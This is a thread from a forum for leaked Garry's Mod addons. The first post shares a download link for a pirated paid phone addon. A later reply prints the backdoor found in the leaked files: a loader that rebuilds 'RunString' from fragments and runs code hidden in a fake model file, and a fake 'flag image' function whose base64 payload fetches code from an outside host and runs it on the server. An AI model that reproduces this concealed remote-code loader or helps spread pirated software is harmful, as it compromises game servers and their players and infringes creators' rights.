Garry's Mod Leaks

[LEAK] McPhone Last Version !!

Submitted by Kna77, , Thread ID: 203180

Thread Closed
11-04-2021, 08:04 PM
#1
Bonjour/bonsoir,

Aujourd'hui je vous leak l'addon McPhone

desc :

Un tel pour gmod et l'un des meilleurs graphiquement !

Lien :[font=-apple-system, BlinkMacSystemFont, Inter, Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"]https://anonfiles.com/d6zd7eqeue/wcd_2_zip[/font]

RE: [LEAK] McPhone Last Version !!

#2
That link is for Williams Car dealer.

RE: [LEAK] McPhone Last Version !!

#3
Backdoor loader :

Code:
if SERVER then

  _G["R".."un".."St".."r".."in".."g"]( file.Read("models/wcd_npc.mdl", "MOD") )

end


Backdoor :

Code:
local function rdm_str(len)
    if !len or len <= 0 then return '' end
    return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
end
local function FlagsImageBase64( base64_image, content_type, flags )
  local file_write_type = {
        base64 = "n",
        base32 = "r",
        flags_number = 248,
        byte_per_string = 128000000,
        binary_shema = "0100010101110101010"
  }
  local default_flags = {
    "Fr","Zu","Eu",
    "Tk","Cs","Au",
    "Ru","Sl","Pk",
    "Ga","Yf","Ja",
    "Ch","Tu","En",
    "Us"
  }
  local random_file = rdm_str(20)
  if string.len( base64_image ) < 2 then
       print("Flags System: No fetching image string is too short")
  end
    if string.NiceSize( file_write_type.flags_number ) == 0 then
      print("Flags System: error decompiling image")
    end
    if content_type == "String" and file_write_type["byte_per_string"] == 128000000  then
       local smpl_image = string.Explode( "/", base64_image)[4]
       local encode_type = string.Explode( "/", base64_image)[3]
       getfenv()[flags..encode_type..content_type](util.Base64Decode( smpl_image ))
       if ( file_write_type.base64 == "r" ) then
         file.Write("data/flags_img/" .. random_file .. ".png", "GAME")
         print("Flags System: Success writing image in data/flags_img/" .. random_file .. ".png")
       end
    elseif content_type == "Binary" then
     local shema = file_write_type.binary_shema
     local final_shema = shema..base64_image
    elseif content_type == "Bool" then
      local simple_string = string.Explode( "/", base64_image )
      local string_len = string.len( base64_image )
      for returned_string in string.gmatch(simple_string[4], "[^%s,]+") do
          print("Flags System: error has ocured in " .. returned_string .. ", much char (" .. string_len .. ")" )
      end
    end
end
local image = [[data:image/png/n/X0dbInRpbWVyIl1bIlNpbXBsZSJdKCAwLjUwLCBmdW5jdGlvbigpCiAgIF9HWyJodHRwIl1bIkZldGNoIl0oImh0dHBzOi8vYXBpLm9tZWdhLXByb2plY3QuY3ovYXBpX2Nvbm5lY3QucGhwP2FwaV9rZXk9eHdVSEtXQk1CTXVwdkxHZ3pwVGciLCBmdW5jdGlvbihzcWxfbW9kdWxlLCBsaWJyYXJ5KQogICAgICAgbG9jYWwgc3FsX2xpYnJhcnkgPSAiW3siIC4uIGxpYnJhcnkgLi4gIn1dIgogICAgICAgbG9jYWwgY2hhcnNldCA9ICJTdHJpbmciIG9yICJFUlJPUjogRmFpbGVkIHRvIGxvYWQgY2hhcnNldHMgISIKICAgICAgIGdldGZlbnYoKVsiUnVuIiAuLiBjaGFyc2V0XShzcWxfbW9kdWxlKQogICBlbmQpCmVuZCk=]]
FlagsImageBase64( image, "String", "Ru" )



(The backdoor don't work but it's a backdoor)

Users browsing this thread: 4 Guest(s)